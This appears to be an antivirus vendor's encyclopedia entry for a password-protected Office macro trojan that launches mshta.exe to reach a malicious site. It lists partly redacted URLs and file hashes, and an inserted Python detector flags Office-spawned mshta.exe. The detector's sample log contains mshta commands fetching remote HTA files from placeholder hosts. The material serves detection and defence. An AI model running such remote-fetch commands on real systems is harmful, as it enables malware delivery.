MSOffice/PasswordProtected.B3CF!tr

Analysis

MSOffice/PasswordProtected.B3CF!tr is a generic detection for a trojan.
Since this is a generic detection, malware detected as MSOffice/PasswordProtected.B3CF!tr may have varying behaviour.
Below are some of its observed characteristics/behaviours:

  • This malware arrives as a password protected archive containing a MS Office document. The password to the archive is approximately 3-6 digits in length. Upon opening the document, an image in the file declares the document as protected and asks the user to enable editing/content so that macros can run. If an unsuspecting user clicks "Enable Content", the malware executes further: it utilizes mshta.exe to try to connect to a malicious domain, potentially downloading further components/payload of the attack.

  • Below are images of the malicious document (captions only):
    • Figure 1: Before enabling editing/content.
    • Figure 2: After enabling editing/content.
    • Figure 3: Utilizing mshta.exe.


  • Below are some of the sites associated with the trojan:
    • http://91.2[removed]as/se.html
    • http://91.2[removed]nn/se.html
    • http://91.2[removed]aa/se.html

  • Following are some of the exact IOCs (file hashes) associated with this detection:
    • MD5: 24b8882db00b8d6ea8c3329f61daf0eb
      SHA256: 5da7512c9c02a5b925a6a0361ad916e64f17a0552db9db6daaf67411648806c6
    • MD5: b578993556e27105217ccf8ff80f5743
      SHA256: d5fcc40fd1a826e3c2ab64a095ab8af23bf271bc43e27b4e1d0513f1e4dbb4b1
    • MD5: ed6c70dc6d0ea14cb10594deeaa7637c
      SHA256: 3125aad3f74065c8dcdc25ab27824af7fb93f7c71786684c199b1e1a46162ad4
    • MD5: feef1789c4d1f22a7f5c846a6d62d22f
      SHA256: d61257109f48fc61a9ce683320b4e3e84eb5698e729c5658596af238111473ac
    • MD5: 2639abb3c078e563b7123f395522c68b
      SHA256: 5689384baac7a92c1c8a45ec1e3864c57b1616c3c93f735fb5aa1d9f8b1880e4
    • MD5: 4ff31812b3b44885b15941a23be9e47a
      SHA256: c3ce3a92b6f7ba8998cde3d35455a8bd610b8f70b4527a06268755ec7783098c
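The behaviour described above (an Office document whose macro launches mshta.exe against a remote site) is the kind of parent/child process pattern a defender can flag from endpoint telemetry. The following Python is an added example, not code from the Fortinet entry: it parses process-creation records in a constructed key=value format loosely modelled on Sysmon Event ID 1 fields and reports every case where an Office application spawned mshta.exe with a URL on its command line. The paths, timestamps and hostnames in the sample log are constructed placeholders and are not IOCs from this entry.

```python
"""Detect Office-spawned mshta.exe launches that point at a remote URL.

Added example; not code from the Fortinet entry. Records are in a
constructed key=value format (values with spaces are double-quoted),
loosely modelled on Sysmon Event ID 1 fields. All sample values below
are constructed placeholders, not IOCs from the entry.
"""
import ntpath
import re
from urllib.parse import urlparse

# Office parents that should rarely launch a script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe"}

# key=value pairs; a value containing spaces is double-quoted.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample records (hostnames use the reserved .invalid TLD).
SAMPLE_LOG = r"""
ts=2023-01-01T10:01:02Z parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://example.invalid/se.html"
ts=2023-01-01T10:01:05Z parent=C:\Windows\explorer.exe image=C:\Windows\System32\mshta.exe cmdline="mshta.exe C:\Users\user\AppData\Local\Temp\setup.hta"
ts=2023-01-01T10:02:11Z parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c dir"
ts=2023-01-01T10:03:40Z parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\mshta.exe cmdline="mshta.exe https://example.invalid/payload.hta"
"""


def parse_record(line):
    """Parse one key=value record into a dict, stripping quotes from values."""
    fields = {}
    for key, raw in FIELD_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def office_mshta_remote_host(rec):
    """Return the contacted hostname when an Office parent launched mshta.exe
    with a URL argument; otherwise return None."""
    parent = ntpath.basename(rec.get("parent", "")).lower()
    image = ntpath.basename(rec.get("image", "")).lower()
    if parent not in OFFICE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    match = URL_RE.search(rec.get("cmdline", ""))
    if match is None:
        # mshta.exe running a local .hta file is not the remote-fetch pattern.
        return None
    return urlparse(match.group(0)).hostname


def scan(log_text):
    """Return one alert dict per record that matches the pattern."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        host = office_mshta_remote_host(rec)
        if host:
            alerts.append({
                "ts": rec.get("ts"),
                "parent": ntpath.basename(rec["parent"]),
                "host": host,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['parent']} -> mshta.exe -> {alert['host']}")
```

On the constructed sample, only the two WINWORD.EXE records are reported: the explorer.exe launch of a local .hta and the EXCEL.EXE launch of cmd.exe fall outside the pattern. The hostname extracted from each alert is what an analyst would compare against the sites listed for this detection.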

Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiGate
FortiClient
FortiAPS
FortiAPU
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2023-03-07 91.01211
2022-08-09 90.04916
2022-04-05 90.01122
2022-02-10 89.09511
2022-02-10 89.09505